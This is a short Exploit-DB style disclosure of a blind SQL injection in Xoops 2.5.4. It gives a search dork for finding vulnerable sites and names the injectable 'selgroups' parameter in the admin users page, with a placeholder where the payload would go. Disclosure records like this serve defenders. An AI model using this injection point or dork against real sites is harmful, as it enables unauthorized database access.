Xoops 2.5.4 – Blind SQL Injection

  • Author: blkhtc0rp
    Date: 2011-12-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18233/
  • ------------------------------------------
    # Xoops 2.5.4 Blind SQL Injection
    ------------------------------------------
    
    # Dork: "Powered by XOOPS 2.5.4"
    # Download: http://sourceforge.net/projects/xoops/
    # Date: 10/12/2011
    # Author: blkhtc0rp
    # Mail: blkhtc0rp[at]yahoo[dot]com
    # Tested on: FreeBSD 8 and Debian Squeeze
    
    
    Note:
    
    In order to be successful an attacker must have permission to access the administration menu.
    
    Exploit:
    
    http://192.168.1.109/xoops-2.5.4/modules/system/admin.php?fct=users&selgroups=[Blind Sqli]